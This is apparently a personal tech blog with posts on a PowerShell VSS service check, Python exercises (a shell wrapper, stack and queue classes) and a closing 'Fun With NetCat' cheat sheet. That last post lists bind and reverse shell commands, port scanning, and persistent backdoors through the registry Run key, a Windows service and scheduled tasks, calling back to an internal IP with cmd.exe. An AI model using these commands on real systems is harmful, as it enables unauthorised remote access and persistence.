Simple Powershell

I've been playing around with Powershell while working on the Microsoft Exchange 2007 certification.

I've been running into an issue with the Volume Shadow Copy (VSS) service not starting before my scheduled backup would run.  Thus the backup would fail.

I wrote a short Powershell script that is scheduled to run just before the backup is scheduled.  If the VSS service is not started, it starts it.

The code is below:

Get-Service | where { if ( $_.name -match "VSS" -and $_.status -ne "Running" ) { Start-Service VSS }  }

And a shot of the scheduled task:

Some More Python

As I work through the exercises from Core Python Programming 2e I'll post my solutions to some of the exercises that I find interesting.

Here's a wrapper for the Windows command-line interface that allows one to use the Unix/Linux ls, more, cat, cp, mv and rm commands to manipulate files in Windows:

import os
import string

class shell(object):
    def cmd(self):
        while 1:
            cmdLine = raw_input("$ ")
            if "ls" in cmdLine and len(cmdLine) == 2:
                os.system("dir")
            if "ls" in cmdLine[:cmdLine.find(" ")]:
                path = cmdLine[cmdLine.find(" "):]
                os.system("dir" + path)
            if "more" in cmdLine[:cmdLine.find(" ")]:
                path = cmdLine[cmdLine.find(" "):]
                os.system("more" + path)
            if "cat" in cmdLine[:cmdLine.find(" ")]:
                path = cmdLine[cmdLine.find(" "):]
                os.system("type" + path)
            if "cp" in cmdLine[:cmdLine.find(" ")]:
                path1 = cmdLine[cmdLine.find(" "):cmdLine.rfind(" ")]
                path2 = cmdLine[cmdLine.rfind(" "):]
                os.system("copy" + path1 + path2)
            if "mv" in cmdLine[:cmdLine.find(" ")]:
                path1 = cmdLine[cmdLine.find(" "):cmdLine.rfind(" ")]
                path2 = cmdLine[cmdLine.rfind(" "):]
                os.system("ren" + path1 + path2)
            if "rm" in cmdLine[:cmdLine.find(" ")]:
                path = cmdLine[cmdLine.find(" "):]
                os.system("del" + path)

Data Structures in Python

Currently I'm working on learning Python and have been working through various books.

A few of the exercises in the book Core Python Programming 2e ask the reader to implement data structures as classes, specifically stacks and queues.

For those who do not know what a data structure is, you can read about it here.  A stack is a Last-In-First-Out (LIFO) data structure and a queue is a First-In-First-Out (FIFO) data structure.

I chose to use Python's built in list functionality to implement the classes.  The solutions proved to be very simple as opposed to the same solutions being produced in a language like C.

Here is the code:

Stack

class stack(object):
    def __init__(self):
        self.stack = list()

    def push(self, item):
        self.stack.append(item)

    def pop(self):
        self.stack.pop(len(self.stack)-1)

    def isempty(self):
        if len(self.stack) == 0:
            return True
        else:
            return False
   
    #displays the last element of the stack
    def peek(self):
        return self.stack[len(self.stack)-1]

Queue

class queue(object):
    def __init__(self):
        self.queue = list()

    def enqueue(self, item):
        self.queue.append(item)

    def dequeue(self):
        return self.queue.pop(0)

    def isempty(self):
        if len(self.queue) == 0:
            return True
        else:
            return False

    #displays the first element of the queue
    def peek(self):
        return self.queue[0]

Hybrid Stack/Queue

class stackQueue(object):
    def __init__(self):
        self.stackQueue = list()

    def shift(self):
        return self.stackQueue.pop(0)

    def unshift(self, item):
        self.stackQueue.insert(0,item)

    def push(self, item):
        self.stackQueue.append(item)

    def pop(self):
        return self.stackQueue.pop(len(self.stackQueue)-1)

    def isempty(self):
        if len(self.stackQueue) == 0:
            return True
        else:
            return False

     #returns the first element of the data structure
    def peek(self):
        return self.stackQueue[0]

Fun With NetCat

NetCat is known as the TCP/IP Swiss-army knife.  It allows one to write data across a TCP or UDP connection.  It is available for most Unix/Linux operating systems as well as Windows.

Here are some fun things you can do with NetCat:

Execute shell on client connection:
nc –l –p 12345 –e /bin/bash (Unix/Linux)
nc –l –p 12345 –e cmd.exe (Windows)
nc –l –p 12345 –e cmd.exe -L - reopens connection after client closes connections (windows only)

Reverse shell:
nc -l -p 12345
nc <server ip> 12345 -e /bin/bash

Zero i/o mode(port scanning) (-z):
nc -z -v 192.168.1.1 1-65535

Redirect received info to file:
nc –l –p 12345 > dumpfile

Redirect input to file. When client connects, it will receive file:

nc –l –p 12345 < dumpfile
Client connects to server. dumpfile is transfer from server and outputted to client.
nc 192.168.1.1 12345 > dumpfile

Redirect ports and traffic (Relay):
nc –l –p 12345 | nc <hostname of target> 54321

Client connects to server on port 12345 but the target sees traffic coming from the server on
port 54321.

Configure backdoor to run everytime windows user logs in (domain priviledges):
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
“c:\windows\nc.exe -d 192.168.1.70 1234 -e cmd.exe”

Executing backdoor using a windows service(only local system shell):
sc create ncbackdoor binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore

net start ncbackdoor

Executing backdoor using windows task scheduler (only local system shell):
C:\>at 15:00:00 /every:m,t,w,th,f,s,su ““c:\nc.exe -d 192.168.1.70 1234 -e cmd.exe””

Unzip/un-tar file over network:
source:
dd if=some.file.tar.gz | nc <destination ip> 12345 -vvv

destination (tar must be run with the "-"):
nc -l -p 12345 -vv | tar xzf -